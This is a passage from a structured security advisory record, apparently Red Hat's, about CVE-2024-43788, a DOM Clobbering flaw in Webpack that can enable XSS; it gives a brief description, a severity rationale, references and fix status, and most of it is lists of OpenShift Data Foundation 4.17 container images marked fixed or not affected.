"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2308193"
}
],
"notes": [
{
"category": "description",
"text": "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x"
],
"known_not_affected": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43788"
},
{
"category": "external",
"summary": "RHBZ#2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43788"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61",
"url": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986",
"url": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986"
},
{
"category": "external",
"summary": "https://research.securitum.com/xss-in-amp4email-dom-clobbering",
"url": "https://research.securitum.com/xss-in-amp4email-dom-clobbering"
},
{
"category": "external",
"summary": "https://scnps.co/papers/sp23_domclob.pdf",
"url": "https://scnps.co/papers/sp23_domclob.pdf"
}
],
"release_date": "2024-08-27T17:15:07.967000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-30T14:25:22+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8676"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
